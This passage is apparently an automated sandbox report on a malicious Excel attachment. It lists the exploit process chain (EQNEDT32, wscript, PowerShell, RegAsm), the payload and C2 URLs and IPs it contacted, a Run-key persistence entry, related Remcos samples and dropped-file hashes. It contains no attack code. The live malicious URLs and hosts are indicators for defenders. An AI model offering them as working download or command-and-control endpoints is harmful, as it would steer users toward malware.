            http://ocsp.entrust.net03wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpjEQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.google.com;wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://analytics.paste.eewscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://paste.ee/d/iuC2igvwscript.exe, 00000009.00000003.431827511.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.0000000000716000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://paste.ee/ewscript.exe, 00000009.00000002.436417928.0000000003AA6000.00000004.00000020.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://z2.ink/nLNGyXFE430000.0.dr, ~DF413A5A3890D32AE4.TMP.0.drfalse
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://www.google.comwscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://uploaddeimagens.com.br/images/00powershell.exe, 0000000C.00000002.477785176.0000000005013000.00000004.00000020.00020000.00000000.sdmptrue
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/json.gp/Cpowershell.exe, 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
            • URL Reputation: phishing
            unknown
            https://uploaddeimagens.com.brpowershell.exe, 0000000C.00000002.466787853.00000000028AA000.00000004.00000800.00020000.00000000.sdmptrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://analytics.paste.ee;wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cdnjs.cloudflare.comwscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://cdnjs.cloudflare.com;wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.entrust.net0Dwscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://z2.ink/z2.ink.url.4.drfalse
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.549227483.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.466787853.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.465713352.0000000002771000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://secure.comodo.com/CPS0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://secure.gravatar.comwscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://themes.googleusercontent.comwscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.entrust.net/2048ca.crl0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpwEQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            54.241.153.192 | z2.ink | United States | 16509 | AMAZON-02US | true
            188.114.97.3 | paste.ee | European Union | 13335 | CLOUDFLARENETUS | true
            178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
            198.46.178.154 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
            194.187.251.115 | sembe.duckdns.org | United Kingdom | 9009 | M247GB | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1447833
            Start date and time:2024-05-27 08:59:12 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 12m 7s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:22
            Number of new started drivers analysed:1
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Ref19920830281982938RT.xls
            Detection:MAL
            Classification:mal100.spre.troj.spyw.expl.evad.winXLS@19/35@11/5
            EGA Information:
            • Successful, ratio: 40%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 71
            • Number of non-executed functions: 189
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            • Override analysis time to 240s for powershell
            • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3300 because there are no executed function
            • Execution Graph export aborted for target powershell.exe, PID 3508 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 3856 because it is empty
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            Time | Type | Description
            00:00:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\incontrovertido.vbs
            00:01:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\incontrovertido.vbs
            03:00:37 | API Interceptor | 38x Sleep call for process: EQNEDT32.EXE modified
            03:00:39 | API Interceptor | 87x Sleep call for process: wscript.exe modified
            03:00:42 | API Interceptor | 291x Sleep call for process: powershell.exe modified
            03:00:58 | API Interceptor | 9536457x Sleep call for process: RegAsm.exe modified
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            54.241.153.192swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • z2.ink/n7QN
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • z2.ink/
            188.114.97.3http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
            • worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
            http://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
            • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
            http://twomancake.comGet hashmaliciousUnknownBrowse
            • twomancake.com/
            BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
            • fleur-de-lis.sbs/jhgfd
            Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
            • qr-in.com/YXcuqXy
            LHER000698175.xlsGet hashmaliciousUnknownBrowse
            • qr-in.com/JeYCrvM
            PO 4500025813.xlsGet hashmaliciousUnknownBrowse
            • qr-in.com/RtWEZGi
            SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
            • rocheholding.top/evie3/five/fre.php
            WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
            • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
            http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
            • hjkie5.pages.dev/
            178.237.33.50LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            dhl_awb_shipping_invoice_24_05_2024_000000000000024.exeGet hashmaliciousGuLoader, RemcosBrowse
            • geoplugin.net/json.gp
            OjTT5RzE3n.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • geoplugin.net/json.gp
            OSE - PO & FCST - ___-LT24052303183991-01.exeGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            Customer Advisory - HS Code - Maersk Shipping.doc.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • geoplugin.net/json.gp
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • geoplugin.net/json.gp
            z10Original-Copy.bat.exeGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            #Inv_PI_{number_12}_pdf.exeGet hashmaliciousRemcosBrowse
            • geoplugin.net/json.gp
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            sembe.duckdns.orgLHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 194.187.251.115
            Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
            • 194.187.251.115
            License authorization Custom invoice INFO - Factura Aduana INFO (2).xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
            • 194.187.251.115
            20240506_120821.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
            • 194.187.251.115
            20240506_120821.batGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
            • 194.187.251.115
            Fatura #U00f6demesi VR046190.docx.docGet hashmaliciousDBatLoaderBrowse
            • 194.187.251.115
            fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
            • 194.187.251.115
            nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
            • 194.187.251.115
            1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
            • 194.187.251.115
            Ziraat Bankas#U0131 Swift Mesaji2.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
            • 194.187.251.115
            z2.inkswift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            swift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            swift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 54.241.153.192
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 54.241.153.192
            paste.eeLHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            upload.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            update.vbsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            file.vbsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            windows.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            INVOICE.jsGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            Dados Do Hospede.ppamGet hashmaliciousNjratBrowse
            • 188.114.96.3
            Receipt #761.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Drwg.xlsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            geoplugin.netLHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            dhl_awb_shipping_invoice_24_05_2024_000000000000024.exeGet hashmaliciousGuLoader, RemcosBrowse
            • 178.237.33.50
            OjTT5RzE3n.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            OSE - PO & FCST - ___-LT24052303183991-01.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Customer Advisory - HS Code - Maersk Shipping.doc.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            z10Original-Copy.bat.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            #Inv_PI_{number_12}_pdf.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            CLOUDFLARENETUSPO_27052024.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            #U0426#U0438#U0442#U0430#U0442#U0430.exeGet hashmaliciousFormBookBrowse
            • 172.64.41.3
            TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
            • 188.114.96.3
            https://verify-signinoutlexchangeadmin.com/MBill@microsoft.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
            • 104.17.2.184
            Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
            • 188.114.97.3
            https://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
            • 104.16.242.248
            https://brownpluss.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
            • 104.17.2.184
            setup_CodecInstaller_full.exeGet hashmaliciousEICARBrowse
            • 172.67.130.88
            MV XH DOLPHINPDF.exeGet hashmaliciousLokibotBrowse
            • 104.21.85.101
            WQs56g5xeC.exeGet hashmaliciousDCRatBrowse
            • 172.67.25.118
            AMAZON-02US#U0426#U0438#U0442#U0430#U0442#U0430.exeGet hashmaliciousFormBookBrowse
            • 18.143.129.199
            https://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
            • 18.156.141.44
            lrZL6K5Idl.exeGet hashmaliciousNjratBrowse
            • 108.132.8.18
            https://fix-to-all-issues-review-verification-form-aa-submit-wheat.vercel.app/Get hashmaliciousHTMLPhisherBrowse
            • 76.76.21.9
            https://sweet-moonbeam-28ccf4.netlify.app/appeal.html/Get hashmaliciousUnknownBrowse
            • 52.30.24.58
            https://origines-decoration.com/Get hashmaliciousUnknownBrowse
            • 18.159.147.43
            https://kruekanlogin.gitbook.io/Get hashmaliciousUnknownBrowse
            • 76.223.111.18
            https://fix-to-all-issues-review-verifications-o-form-a-submit-a.vercel.app/Get hashmaliciousHTMLPhisherBrowse
            • 76.76.21.22
            https://fbrestriction.wixsite.com/facebookGet hashmaliciousUnknownBrowse
            • 108.156.60.112
            https://www.allianceswap.finance/Get hashmaliciousUnknownBrowse
            • 52.208.173.59
            AS-COLOCROSSINGUShttps://www.brownfieldagnews.com/news/Get hashmaliciousUnknownBrowse
            • 23.95.182.29
            https://springs-citation-house-congressional.trycloudflare.com/win/print.exeGet hashmaliciousXmrigBrowse
            • 107.172.34.27
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 198.46.178.154
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 198.12.107.122
            Offer Document 23.lnkGet hashmaliciousFormBookBrowse
            • 198.46.174.157
            Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 192.3.27.169
            wz5CHr5oLF.elfGet hashmaliciousMiraiBrowse
            • 107.173.61.88
            Inventory_Analysis.xlsGet hashmaliciousUnknownBrowse
            • 192.3.64.142
            Inventory_Analysis.xlsGet hashmaliciousUnknownBrowse
            • 192.3.64.142
            Inventory_Analysis.xlsGet hashmaliciousUnknownBrowse
            • 192.3.64.142
            ATOM86-ASATOM86NLhttps://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
            • 178.237.32.248
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            dhl_awb_shipping_invoice_24_05_2024_000000000000024.exeGet hashmaliciousGuLoader, RemcosBrowse
            • 178.237.33.50
            OjTT5RzE3n.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            OSE - PO & FCST - ___-LT24052303183991-01.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Customer Advisory - HS Code - Maersk Shipping.doc.exeGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • 178.237.33.50
            z10Original-Copy.bat.exeGet hashmaliciousRemcosBrowse
            • 178.237.33.50
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            05af1f5ca1b87cc9cc9b25185115607d37SD8SH18I.docmGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • 188.114.97.3
            1080.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Sipari#U015f detaylar#U0131.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Drwg.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Pepsico RFQ_P1005712.xlsGet hashmaliciousGuLoaderBrowse
            • 188.114.97.3
            ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            7dcce5b76c8b17472d024758970a406bLHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            Items.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Items.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            ArOuryf0GL.rtfGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
            • 188.114.97.3
            948209184.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            No context
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Non-ISO extended-ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):204105
            Entropy (8bit):5.165709687166053
            Encrypted:false
            SSDEEP:3072:A1yO1lQ014CTt1ns3wflGsZcfo0QA5PGpb8h0:A191lF1rflGsZcfu
            MD5:9D7684F978EBD77E6A3EA7EF1330B946
            SHA1:3FA2D2963CBF47FFD5F7F5A9B4576F34ED42E552
            SHA-256:6C96E976DC47E0C99B77814E560E0DC63161C463C75FA15B7A7CA83C11720E82
            SHA-512:496EC0BA2EEA98355F18201E9021748AB32DE7E5996C54D9C5C4AFBE34B1C7CD2F50E05EC50F2C552E04E121BEDFFED6234ED111C25FC7A2454B33A1D6C55D6F
            Malicious:false
            Preview:'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02561327614152181
            Encrypted:false
            SSDEEP:6:I3DPczkx9vxggLRVefUIxnCtDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKkRQPg3vYg3J/
            MD5:9BAA85916F08F558262C035291B86B95
            SHA1:437B9E6B79B0ED9F29284622B30A3D00C2F328D7
            SHA-256:1274B9503A3133A301FBE723FCCEA8C66BB38C31DE992ADBC0B87EA2AA1ABC92
